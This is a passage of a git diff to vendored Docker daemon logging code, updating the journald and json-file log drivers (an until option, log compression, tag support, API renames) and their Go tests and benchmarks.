+		"CONTAINER_NAME":    info.Name(),
 		"CONTAINER_TAG":     tag,
+		"SYSLOG_IDENTIFIER": tag,
+	}
+	extraAttrs, err := info.ExtraAttributes(sanitizeKeyMod)
+	if err != nil {
+		return nil, err
 	}
-	extraAttrs := ctx.ExtraAttributes(sanitizeKeyMod)
 	for k, v := range extraAttrs {
 		vars[k] = v
 	}
@@ -95,6 +94,7 @@ func validateLogOpt(cfg map[string]string) error {
 		switch key {
 		case "labels":
 		case "env":
+		case "env-regex":
 		case "tag":
 		default:
 			return fmt.Errorf("unknown log opt '%s' for journald log driver", key)
@@ -108,13 +108,18 @@ func (s *journald) Log(msg *logger.Message) error {
 	for k, v := range s.vars {
 		vars[k] = v
 	}
-	if msg.Partial {
+	if msg.PLogMetaData != nil {
 		vars["CONTAINER_PARTIAL_MESSAGE"] = "true"
 	}
-	if msg.Source == "stderr" {
-		return journal.Send(string(msg.Line), journal.PriErr, vars)
+
+	line := string(msg.Line)
+	source := msg.Source
+	logger.PutMessage(msg)
+
+	if source == "stderr" {
+		return journal.Send(line, journal.PriErr, vars)
 	}
-	return journal.Send(string(msg.Line), journal.PriInfo, vars)
+	return journal.Send(line, journal.PriInfo, vars)
 }
 
 func (s *journald) Name() string {
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go
index 224423fd07..bd7bf7a3b3 100644
--- a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package journald
+package journald // import "github.com/docker/docker/daemon/logger/journald"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go
index d52ca92e4f..7899fc1214 100644
--- a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package journald
+package journald // import "github.com/docker/docker/daemon/logger/journald"
 
 type journald struct {
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read.go b/vendor/github.com/docker/docker/daemon/logger/journald/read.go
index d91eb809bc..d4bcc62d9a 100644
--- a/vendor/github.com/docker/docker/daemon/logger/journald/read.go
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read.go
@@ -1,6 +1,6 @@
 // +build linux,cgo,!static_build,journald
 
-package journald
+package journald // import "github.com/docker/docker/daemon/logger/journald"
 
 // #include <sys/types.h>
 // #include <sys/poll.h>
@@ -155,27 +155,31 @@ import (
 	"time"
 	"unsafe"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/coreos/go-systemd/journal"
+	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/daemon/logger"
+	"github.com/sirupsen/logrus"
 )
 
 func (s *journald) Close() error {
-	s.readers.mu.Lock()
+	s.mu.Lock()
+	s.closed = true
 	for reader := range s.readers.readers {
 		reader.Close()
 	}
-	s.readers.mu.Unlock()
+	s.mu.Unlock()
 	return nil
 }
 
-func (s *journald) drainJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, oldCursor *C.char) *C.char {
+func (s *journald) drainJournal(logWatcher *logger.LogWatcher, j *C.sd_journal, oldCursor *C.char, untilUnixMicro uint64) (*C.char, bool) {
 	var msg, data, cursor *C.char
 	var length C.size_t
 	var stamp C.uint64_t
 	var priority, partial C.int
+	var done bool
 
-	// Walk the journal from here forward until we run out of new entries.
+	// Walk the journal from here forward until we run out of new entries
+	// or we reach the until value (if provided).
 drain:
 	for {
 		// Try not to send a given entry twice.
@@ -193,6 +197,12 @@ drain:
 			if C.sd_journal_get_realtime_usec(j, &stamp) != 0 {
 				break
 			}
+			// Break if the timestamp exceeds any provided until flag.
+			if untilUnixMicro != 0 && untilUnixMicro < uint64(stamp) {
+				done = true
+				break
+			}
+
 			// Set up the time and text of the entry.
 			timestamp := time.Unix(int64(stamp)/1000000, (int64(stamp)%1000000)*1000)
 			line := C.GoBytes(unsafe.Pointer(msg), C.int(length))
@@ -212,14 +222,11 @@ drain:
 				source = "stdout"
 			}
 			// Retrieve the values of any variables we're adding to the journal.
-			attrs := make(map[string]string)
+			var attrs []backend.LogAttr
 			C.sd_journal_restart_data(j)
 			for C.get_attribute_field(j, &data, &length) > C.int(0) {
 				kv := strings.SplitN(C.GoStringN(data, C.int(length)), "=", 2)
-				attrs[kv[0]] = kv[1]
-			}
-			if len(attrs) == 0 {
-				attrs = nil
+				attrs = append(attrs, backend.LogAttr{Key: kv[0], Value: kv[1]})
 			}
 			// Send the log message.
 			logWatcher.Msg <- &logger.Message{
@@ -237,41 +244,65 @@ drain:
 
 	// free(NULL) is safe
 	C.free(unsafe.Pointer(oldCursor))
-	C.sd_journal_get_cursor(j, &cursor)
-	return cursor
+	if C.sd_journal_get_cursor(j, &cursor) != 0 {
+		// ensure that we won't be freeing an address that's invalid
+		cursor = nil
+	}
+	return cursor, done
 }
 
-func (s *journald) followJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, pfd [2]C.int, cursor *C.char) *C.char {
-	s.readers.mu.Lock()
+func (s *journald) followJournal(logWatcher *logger.LogWatcher, j *C.sd_journal, pfd [2]C.int, cursor *C.char, untilUnixMicro uint64) *C.char {
+	s.mu.Lock()
 	s.readers.readers[logWatcher] = logWatcher
-	s.readers.mu.Unlock()
+	if s.closed {
+		// the journald Logger is closed, presumably because the container has been
+		// reset.  So we shouldn't follow, because we'll never be woken up.  But we
+		// should make one more drainJournal call to be sure we've got all the logs.
+		// Close pfd[1] so that one drainJournal happens, then cleanup, then return.
+		C.close(pfd[1])
+	}
+	s.mu.Unlock()
+
+	newCursor := make(chan *C.char)
+
 	go func() {
-		// Keep copying journal data out until we're notified to stop
-		// or we hit an error.
-		status := C.wait_for_data_cancelable(j, pfd[0])
-		for status == 1 {
-			cursor = s.drainJournal(logWatcher, config, j, cursor)
-			status = C.wait_for_data_cancelable(j, pfd[0])
-		}
-		if status < 0 {
-			cerrstr := C.strerror(C.int(-status))
-			errstr := C.GoString(cerrstr)
-			fmtstr := "error %q while attempting to follow journal for container %q"
-			logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"])
+		for {
+			// Keep copying journal data out until we're notified to stop
+			// or we hit an error.
+			status := C.wait_for_data_cancelable(j, pfd[0])
+			if status < 0 {
+				cerrstr := C.strerror(C.int(-status))
+				errstr := C.GoString(cerrstr)
+				fmtstr := "error %q while attempting to follow journal for container %q"
+				logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"])
+				break
+			}
+
+			var done bool
+			cursor, done = s.drainJournal(logWatcher, j, cursor, untilUnixMicro)
+
+			if status != 1 || done {
+				// We were notified to stop
+				break
+			}
 		}
+
 		// Clean up.
 		C.close(pfd[0])
-		s.readers.mu.Lock()
+		s.mu.Lock()
 		delete(s.readers.readers, logWatcher)
-		s.readers.mu.Unlock()
-		C.sd_journal_close(j)
+		s.mu.Unlock()
 		close(logWatcher.Msg)
+		newCursor <- cursor
 	}()
+
 	// Wait until we're told to stop.
 	select {
+	case cursor = <-newCursor:
 	case <-logWatcher.WatchClose():
 		// Notify the other goroutine that its work is done.
 		C.close(pfd[1])
+		cursor = <-newCursor
 	}
 
 	return cursor
@@ -282,6 +313,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon
 	var cmatch, cursor *C.char
 	var stamp C.uint64_t
 	var sinceUnixMicro uint64
+	var untilUnixMicro uint64
 	var pipes [2]C.int
 
 	// Get a handle to the journal.
@@ -298,9 +330,9 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon
 	following := false
 	defer func(pfollowing *bool) {
 		if !*pfollowing {
-			C.sd_journal_close(j)
 			close(logWatcher.Msg)
 		}
+		C.sd_journal_close(j)
 	}(&following)
 	// Remove limits on the size of data items that we'll retrieve.
 	rc = C.sd_journal_set_data_threshold(j, C.size_t(0))
@@ -321,10 +353,19 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon
 		nano := config.Since.UnixNano()
 		sinceUnixMicro = uint64(nano / 1000)
 	}
+	// If we have an until value, convert it too
+	if !config.Until.IsZero() {
+		nano := config.Until.UnixNano()
+		untilUnixMicro = uint64(nano / 1000)
+	}
 	if config.Tail > 0 {
 		lines := config.Tail
-		// Start at the end of the journal.
-		if C.sd_journal_seek_tail(j) < 0 {
+		// If until time provided, start from there.
+		// Otherwise start at the end of the journal.
+		if untilUnixMicro != 0 && C.sd_journal_seek_realtime_usec(j, C.uint64_t(untilUnixMicro)) < 0 {
+			logWatcher.Err <- fmt.Errorf("error seeking provided until value")
+			return
+		} else if C.sd_journal_seek_tail(j) < 0 {
 			logWatcher.Err <- fmt.Errorf("error seeking to end of journal")
 			return
 		}
@@ -340,8 +381,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon
 			if C.sd_journal_get_realtime_usec(j, &stamp) != 0 {
 				break
 			} else {
-				// Compare the timestamp on the entry
-				// to our threshold value.
+				// Compare the timestamp on the entry to our threshold value.
 				if sinceUnixMicro != 0 && sinceUnixMicro > uint64(stamp) {
 					break
 				}
@@ -370,7 +410,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon
 			return
 		}
 	}
-	cursor = s.drainJournal(logWatcher, config, j, nil)
+	cursor, _ = s.drainJournal(logWatcher, j, nil, untilUnixMicro)
 	if config.Follow {
 		// Allocate a descriptor for following the journal, if we'll
 		// need one.  Do it here so that we can report if it fails.
@@ -382,7 +422,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon
 			if C.pipe(&pipes[0]) == C.int(-1) {
 				logWatcher.Err <- fmt.Errorf("error opening journald close notification pipe")
 			} else {
-				cursor = s.followJournal(logWatcher, config, j, pipes, cursor)
+				cursor = s.followJournal(logWatcher, j, pipes, cursor, untilUnixMicro)
 				// Let followJournal handle freeing the journal context
 				// object and closing the channel.
 				following = true
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go
index bba6de55be..ab68cf4ba7 100644
--- a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go
@@ -1,6 +1,6 @@
 // +build linux,cgo,!static_build,journald,!journald_compat
 
-package journald
+package journald // import "github.com/docker/docker/daemon/logger/journald"
 
 // #cgo pkg-config: libsystemd
 import "C"
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go
index 3f7a43c59e..4806e130ef 100644
--- a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go
@@ -1,6 +1,6 @@
 // +build linux,cgo,!static_build,journald,journald_compat
 
-package journald
+package journald // import "github.com/docker/docker/daemon/logger/journald"
 
 // #cgo pkg-config: libsystemd-journal
 import "C"
diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go
index b43abdcaf7..a66b666659 100644
--- a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux !cgo static_build !journald
 
-package journald
+package journald // import "github.com/docker/docker/daemon/logger/journald"
 
 func (s *journald) Close() error {
 	return nil
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go
index a429a08a4f..b806a5ad17 100644
--- a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go
@@ -1,7 +1,7 @@
 // Package jsonfilelog provides the default Logger implementation for
 // Docker logging. This logger logs to files on the host server in the
 // JSON format.
-package jsonfilelog
+package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog"
 
 import (
 	"bytes"
@@ -10,11 +10,12 @@ import (
 	"strconv"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
 	"github.com/docker/docker/daemon/logger/loggerutils"
-	"github.com/docker/docker/pkg/jsonlog"
 	"github.com/docker/go-units"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // Name is the name of the file that the jsonlogger logs to.
@@ -22,11 +23,11 @@ const Name = "json-file"
 
 // JSONFileLogger is Logger implementation for default Docker logging.
 type JSONFileLogger struct {
-	buf     *bytes.Buffer
-	writer  *loggerutils.RotateFileWriter
 	mu      sync.Mutex
+	closed  bool
+	writer  *loggerutils.LogFile
 	readers map[*logger.LogWatcher]struct{} // stores the active log followers
-	extra   []byte                          // json-encoded extra attributes
+	tag     string                          // tag values requested by the user to log
 }
 
 func init() {
@@ -40,17 +41,20 @@ func init() {
 
 // New creates new JSONFileLogger which writes to filename passed in
 // on given context.
-func New(ctx logger.Context) (logger.Logger, error) {
+func New(info logger.Info) (logger.Logger, error) {
 	var capval int64 = -1
-	if capacity, ok := ctx.Config["max-size"]; ok {
+	if capacity, ok := info.Config["max-size"]; ok {
 		var err error
 		capval, err = units.FromHumanSize(capacity)
 		if err != nil {
 			return nil, err
 		}
+		if capval <= 0 {
+			return nil, fmt.Errorf("max-size should be a positive numbler")
+		}
 	}
 	var maxFiles = 1
-	if maxFileString, ok := ctx.Config["max-file"]; ok {
+	if maxFileString, ok := info.Config["max-file"]; ok {
 		var err error
 		maxFiles, err = strconv.Atoi(maxFileString)
 		if err != nil {
@@ -61,13 +65,34 @@ func New(ctx logger.Context) (logger.Logger, error) {
 		}
 	}
 
-	writer, err := loggerutils.NewRotateFileWriter(ctx.LogPath, capval, maxFiles)
+	var compress bool
+	if compressString, ok := info.Config["compress"]; ok {
+		var err error
+		compress, err = strconv.ParseBool(compressString)
+		if err != nil {
+			return nil, err
+		}
+		if compress && (maxFiles == 1 || capval == -1) {
+			return nil, fmt.Errorf("compress cannot be true when max-file is less than 2 or max-size is not set")
+		}
+	}
+
+	attrs, err := info.ExtraAttributes(nil)
 	if err != nil {
 		return nil, err
 	}
 
+	// no default template. only use a tag if the user asked for it
+	tag, err := loggerutils.ParseLogTag(info, "")
+	if err != nil {
+		return nil, err
+	}
+	if tag != "" {
+		attrs["tag"] = tag
+	}
+
 	var extra []byte
-	if attrs := ctx.ExtraAttributes(nil); len(attrs) > 0 {
+	if len(attrs) > 0 {
 		var err error
 		extra, err = json.Marshal(attrs)
 		if err != nil {
@@ -75,42 +100,52 @@ func New(ctx logger.Context) (logger.Logger, error) {
 		}
 	}
 
+	buf := bytes.NewBuffer(nil)
+	marshalFunc := func(msg *logger.Message) ([]byte, error) {
+		if err := marshalMessage(msg, extra, buf); err != nil {
+			return nil, err
+		}
+		b := buf.Bytes()
+		buf.Reset()
+		return b, nil
+	}
+
+	writer, err := loggerutils.NewLogFile(info.LogPath, capval, maxFiles, compress, marshalFunc, decodeFunc, 0640)
+	if err != nil {
+		return nil, err
+	}
+
 	return &JSONFileLogger{
-		buf:     bytes.NewBuffer(nil),
 		writer:  writer,
 		readers: make(map[*logger.LogWatcher]struct{}),
-		extra:   extra,
+		tag:     tag,
 	}, nil
 }
 
 // Log converts logger.Message to jsonlog.JSONLog and serializes it to file.
 func (l *JSONFileLogger) Log(msg *logger.Message) error {
-	timestamp, err := jsonlog.FastTimeMarshalJSON(msg.Timestamp)
-	if err != nil {
-		return err
-	}
 	l.mu.Lock()
-	logline := msg.Line
-	if !msg.Partial {
-		logline = append(msg.Line, '\n')
+	err := l.writer.WriteLogEntry(msg)
+	l.mu.Unlock()
+	return err
+}
+
+func marshalMessage(msg *logger.Message, extra json.RawMessage, buf *bytes.Buffer) error {
+	logLine := msg.Line
+	if msg.PLogMetaData == nil || (msg.PLogMetaData != nil && msg.PLogMetaData.Last) {
+		logLine = append(msg.Line, '\n')
 	}
-	err = (&jsonlog.JSONLogs{
-		Log:      logline,
+	err := (&jsonlog.JSONLogs{
+		Log:      logLine,
 		Stream:   msg.Source,
-		Created:  timestamp,
-		RawAttrs: l.extra,
-	}).MarshalJSONBuf(l.buf)
+		Created:  msg.Timestamp,
+		RawAttrs: extra,
+	}).MarshalJSONBuf(buf)
 	if err != nil {
-		l.mu.Unlock()
-		return err
+		return errors.Wrap(err, "error writing log message to buffer")
 	}
-
-	l.buf.WriteByte('\n')
-	_, err = l.writer.Write(l.buf.Bytes())
-	l.buf.Reset()
-	l.mu.Unlock()
-
-	return err
+	err = buf.WriteByte('\n')
+	return errors.Wrap(err, "error finalizing log buffer")
 }
 
 // ValidateLogOpt looks for json specific log options max-file & max-size.
@@ -119,8 +154,11 @@ func ValidateLogOpt(cfg map[string]string) error {
 		switch key {
 		case "max-file":
 		case "max-size":
+		case "compress":
 		case "labels":
 		case "env":
+		case "env-regex":
+		case "tag":
 		default:
 			return fmt.Errorf("unknown log opt '%s' for json-file log driver", key)
 		}
@@ -128,14 +166,10 @@ func ValidateLogOpt(cfg map[string]string) error {
 	return nil
 }
 
-// LogPath returns the location the given json logger logs to.
-func (l *JSONFileLogger) LogPath() string {
-	return l.writer.LogPath()
-}
-
 // Close closes underlying file and signals all readers to stop.
 func (l *JSONFileLogger) Close() error {
 	l.mu.Lock()
+	l.closed = true
 	err := l.writer.Close()
 	for r := range l.readers {
 		r.Close()
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go
index b5b818a8ba..22bbcf2eb7 100644
--- a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go
@@ -1,6 +1,8 @@
-package jsonfilelog
+package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog"
 
 import (
+	"bytes"
+	"compress/gzip"
 	"encoding/json"
 	"io/ioutil"
 	"os"
@@ -11,7 +13,10 @@ import (
 	"time"
 
 	"github.com/docker/docker/daemon/logger"
-	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
 )
 
 func TestJSONFileLogger(t *testing.T) {
@@ -22,7 +27,7 @@ func TestJSONFileLogger(t *testing.T) {
 	}
 	defer os.RemoveAll(tmp)
 	filename := filepath.Join(tmp, "container.log")
-	l, err := New(logger.Context{
+	l, err := New(logger.Info{
 		ContainerID: cid,
 		LogPath:     filename,
 	})
@@ -54,36 +59,78 @@ func TestJSONFileLogger(t *testing.T) {
 	}
 }
 
-func BenchmarkJSONFileLogger(b *testing.B) {
+func TestJSONFileLoggerWithTags(t *testing.T) {
 	cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657"
+	cname := "test-container"
 	tmp, err := ioutil.TempDir("", "docker-logger-")
-	if err != nil {
-		b.Fatal(err)
-	}
+
+	assert.NilError(t, err)
+
 	defer os.RemoveAll(tmp)
 	filename := filepath.Join(tmp, "container.log")
-	l, err := New(logger.Context{
-		ContainerID: cid,
-		LogPath:     filename,
+	l, err := New(logger.Info{
+		Config: map[string]string{
+			"tag": "{{.ID}}/{{.Name}}", // first 12 characters of ContainerID and full ContainerName
+		},
+		ContainerID:   cid,
+		ContainerName: cname,
+		LogPath:       filename,
 	})
-	if err != nil {
-		b.Fatal(err)
-	}
+
+	assert.NilError(t, err)
 	defer l.Close()
 
-	testLine := "Line that thinks that it is log line from docker\n"
-	msg := &logger.Message{Line: []byte(testLine), Source: "stderr", Timestamp: time.Now().UTC()}
-	jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON()
-	if err != nil {
-		b.Fatal(err)
+	err = l.Log(&logger.Message{Line: []byte("line1"), Source: "src1"})
+	assert.NilError(t, err)
+
+	err = l.Log(&logger.Message{Line: []byte("line2"), Source: "src2"})
+	assert.NilError(t, err)
+
+	err = l.Log(&logger.Message{Line: []byte("line3"), Source: "src3"})
+	assert.NilError(t, err)
+
+	res, err := ioutil.ReadFile(filename)
+	assert.NilError(t, err)
+
+	expected := `{"log":"line1\n","stream":"src1","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"}
+{"log":"line2\n","stream":"src2","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"}
+{"log":"line3\n","stream":"src3","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"}
+`
+	assert.Check(t, is.Equal(expected, string(res)))
+}
+
+func BenchmarkJSONFileLoggerLog(b *testing.B) {
+	tmp := fs.NewDir(b, "bench-jsonfilelog")
+	defer tmp.Remove()
+
+	jsonlogger, err := New(logger.Info{
+		ContainerID: "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657",
+		LogPath:     tmp.Join("container.log"),
+		Config: map[string]string{
+			"labels": "first,second",
+		},
+		ContainerLabels: map[string]string{
+			"first":  "label_value",
+			"second": "label_foo",
+		},
+	})
+	assert.NilError(b, err)
+	defer jsonlogger.Close()
+
+	msg := &logger.Message{
+		Line:      []byte("Line that thinks that it is log line from docker\n"),
+		Source:    "stderr",
+		Timestamp: time.Now().UTC(),
 	}
-	b.SetBytes(int64(len(jsonlog)+1) * 30)
+
+	buf := bytes.NewBuffer(nil)
+	assert.NilError(b, marshalMessage(msg, nil, buf))
+	b.SetBytes(int64(buf.Len()))
+
 	b.ResetTimer()
 	for i := 0; i < b.N; i++ {
-		for j := 0; j < 30; j++ {
-			if err := l.Log(msg); err != nil {
-				b.Fatal(err)
-			}
+		if err := jsonlogger.Log(msg); err != nil {
+			b.Fatal(err)
 		}
 	}
 }
@@ -96,8 +143,8 @@ func TestJSONFileLoggerWithOpts(t *testing.T) {
 	}
 	defer os.RemoveAll(tmp)
 	filename := filepath.Join(tmp, "container.log")
-	config := map[string]string{"max-file": "2", "max-size": "1k"}
-	l, err := New(logger.Context{
+	config := map[string]string{"max-file": "3", "max-size": "1k", "compress": "true"}
+	l, err := New(logger.Info{
 		ContainerID: cid,
 		LogPath:     filename,
 		Config:      config,
@@ -106,21 +153,55 @@ func TestJSONFileLoggerWithOpts(t *testing.T) {
 		t.Fatal(err)
 	}
 	defer l.Close()
-	for i := 0; i < 20; i++ {
+	for i := 0; i < 36; i++ {
 		if err := l.Log(&logger.Message{Line: []byte("line" + strconv.Itoa(i)), Source: "src1"}); err != nil {
 			t.Fatal(err)
 		}
 	}
+
 	res, err := ioutil.ReadFile(filename)
 	if err != nil {
 		t.Fatal(err)
 	}
+
 	penUlt, err := ioutil.ReadFile(filename + ".1")
+	if err != nil {
+		if !os.IsNotExist(err) {
+			t.Fatal(err)
+		}
+
+		file, err := os.Open(filename + ".1.gz")
+		defer file.Close()
+		if err != nil {
+			t.Fatal(err)
+		}
+		zipReader, err := gzip.NewReader(file)
+		defer zipReader.Close()
+		if err != nil {
+			t.Fatal(err)
+		}
+		penUlt, err = ioutil.ReadAll(zipReader)
+		if err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	file, err := os.Open(filename + ".2.gz")
+	defer file.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+	zipReader, err := gzip.NewReader(file)
+	defer zipReader.Close()
+	if err != nil {
+		t.Fatal(err)
+	}
+	antepenult, err := ioutil.ReadAll(zipReader)
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	expectedPenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+	expectedAntepenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 {"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 {"log":"line2\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 {"log":"line3\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
@@ -137,10 +218,27 @@ func TestJSONFileLoggerWithOpts(t *testing.T) {
 {"log":"line14\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 {"log":"line15\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 `
-	expected := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+	expectedPenultimate := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 {"log":"line17\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 {"log":"line18\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 {"log":"line19\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line20\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line21\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line22\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line23\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line24\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line25\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line26\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line27\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line28\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line29\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line30\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line31\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+`
+	expected := `{"log":"line32\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line33\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line34\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
+{"log":"line35\n","stream":"src1","time":"0001-01-01T00:00:00Z"}
 `
 
 	if string(res) != expected {
@@ -149,7 +247,9 @@ func TestJSONFileLoggerWithOpts(t *testing.T) {
 	if string(penUlt) != expectedPenultimate {
 		t.Fatalf("Wrong log content: %q, expected %q", penUlt, expectedPenultimate)
 	}
-
+	if string(antepenult) != expectedAntepenultimate {
+		t.Fatalf("Wrong log content: %q, expected %q", antepenult, expectedAntepenultimate)
+	}
 }
 
 func TestJSONFileLoggerWithLabelsEnv(t *testing.T) {
@@ -160,13 +260,13 @@ func TestJSONFileLoggerWithLabelsEnv(t *testing.T) {
 	}
 	defer os.RemoveAll(tmp)
 	filename := filepath.Join(tmp, "container.log")
-	config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl"}
-	l, err := New(logger.Context{
+	config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl", "env-regex": "^dc"}
+	l, err := New(logger.Info{
 		ContainerID:     cid,
 		LogPath:         filename,
 		Config:          config,
 		ContainerLabels: map[string]string{"rack": "101", "dc": "lhr"},
-		ContainerEnv:    []string{"environ=production", "debug=false", "port=10001", "ssl=true"},
+		ContainerEnv:    []string{"environ=production", "debug=false", "port=10001", "ssl=true", "dc_region=west"},
 	})
 	if err != nil {
 		t.Fatal(err)
@@ -189,60 +289,14 @@ func TestJSONFileLoggerWithLabelsEnv(t *testing.T) {
 		t.Fatal(err)
 	}
 	expected := map[string]string{
-		"rack":    "101",
-		"dc":      "lhr",
-		"environ": "production",
-		"debug":   "false",
-		"ssl":     "true",
+		"rack":      "101",
+		"dc":        "lhr",
+		"environ":   "production",
+		"debug":     "false",
+		"ssl":       "true",
+		"dc_region": "west",
 	}
 	if !reflect.DeepEqual(extra, expected) {
 		t.Fatalf("Wrong log attrs: %q, expected %q", extra, expected)
 	}
 }
-
-func BenchmarkJSONFileLoggerWithReader(b *testing.B) {
-	b.StopTimer()
-	b.ResetTimer()
-	cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657"
-	dir, err := ioutil.TempDir("", "json-logger-bench")
-	if err != nil {
-		b.Fatal(err)
-	}
-	defer os.RemoveAll(dir)
-
-	l, err := New(logger.Context{
-		ContainerID: cid,
-		LogPath:     filepath.Join(dir, "container.log"),
-	})
-	if err != nil {
-		b.Fatal(err)
-	}
-	defer l.Close()
-	msg := &logger.Message{Line: []byte("line"), Source: "src1"}
-	jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON()
-	if err != nil {
-		b.Fatal(err)
-	}
-	b.SetBytes(int64(len(jsonlog)+1) * 30)
-
-	b.StartTimer()
-
-	go func() {
-		for i := 0; i < b.N; i++ {
-			for j := 0; j < 30; j++ {
-				l.Log(msg)
-			}
-		}
-		l.Close()
-	}()
-
-	lw := l.(logger.LogReader).ReadLogs(logger.ReadConfig{Follow: true})
-	watchClose := lw.WatchClose()
-	for {
-		select {
-		case <-lw.Msg:
-		case <-watchClose:
-			return
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go
new file mode 100644
index 0000000000..74be8e7da0
--- /dev/null
